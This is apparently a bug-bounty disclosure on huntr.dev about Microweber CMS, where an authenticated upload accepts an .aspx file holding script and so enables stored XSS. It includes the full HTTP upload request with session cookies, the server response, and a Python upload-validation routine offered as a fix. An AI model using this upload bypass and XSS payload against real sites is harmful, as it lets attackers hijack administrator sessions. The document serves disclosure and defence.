huntr | quandqn | 87ED3B42-9824-49B0-91A5-FD908A0601E8
History: Mar 09, 2022 - 2:43 p.m.

Unrestricted file upload leads to stored XSS

2022-03-09 14:43:02
quandqn
www.huntr.dev
64

EPSS: 0.001 (Low) | Percentile: 21.6%

Description

An authenticated user can bypass the upload check and upload an .aspx file, which leads to stored XSS.

Proof of Concept

  • Log in as admin: https://demo.microweber.org/demo/admin/
  • Go to Websites > Edit a page.
  • Under Pictures, choose Add files
  • Instead of uploading a normal picture, use the below request to upload an aspx file.

– The request to upload:

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
Content-Length: 533
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/24/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="name"

xss.aspx
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html

<html>
<script>alert(document.domain)</script>
</html>
����IEND®B`‚
------WebKitFormBoundary7ACkSBriVfqdfw4D--

The response:

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 14:26:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
Connection: close
Content-Type: application/json
Content-Length: 123

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}

[Screenshot: request-response]

  • Visit https://demo.microweber.org/demo/userfiles/media/default/xss.aspx to confirm the XSS.

[Screenshot: XSS]
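The request above succeeds because the server trusts the client-supplied filename and content type. The following is an added example, not Microweber's code, of the server-side validation an image upload endpoint needs to reject it: a last-extension allowlist plus a leading-magic-bytes check, with the file stored under a random name. The magic-byte table and the copy of the PoC file part are constructed for the example.

```python
import os
import secrets

# Allowlisted extensions and the signature each file must START with
# (constructed table for this example; extend to match the deployment).
ALLOWED_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def validate_image_upload(name, data):
    """Return (ok, detail). The client's Content-Type header is ignored on
    purpose; only the filename extension and the bytes themselves count."""
    # Keep only the final path component so '../' and backslash tricks vanish
    base = os.path.basename(name.replace("\\", "/"))
    # Judge by the LAST extension, so 'pic.png.aspx' is treated as .aspx
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_MAGIC:
        return False, "extension not allowed: %s" % (ext or "(none)")
    # A real image begins with its format signature. The PoC body only
    # carries a trailing PNG IEND chunk, which does not pass this check.
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"
    return True, ext


def storage_name(ext):
    # Never persist under the client-supplied name: random name + validated ext
    return secrets.token_hex(16) + ext


# Constructed copy of the PoC file part: HTML followed by a PNG IEND trailer
POC_FILE = (b"<html>\n<script>alert(document.domain)</script>\n</html>\n"
            b"\x00\x00\x00\x00IEND\xaeB`\x82")

if __name__ == "__main__":
    print(validate_image_upload("xss.aspx", POC_FILE))
    print(validate_image_upload("xss.png", POC_FILE))
    print(validate_image_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))
```

Serving the upload directory with `X-Content-Type-Options: nosniff` and no script handlers is the complementary control on the web-server side.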

Impact

If an attacker can control a script that is executed in the victim’s browser, then they can typically fully compromise that user, in this case, an admin.
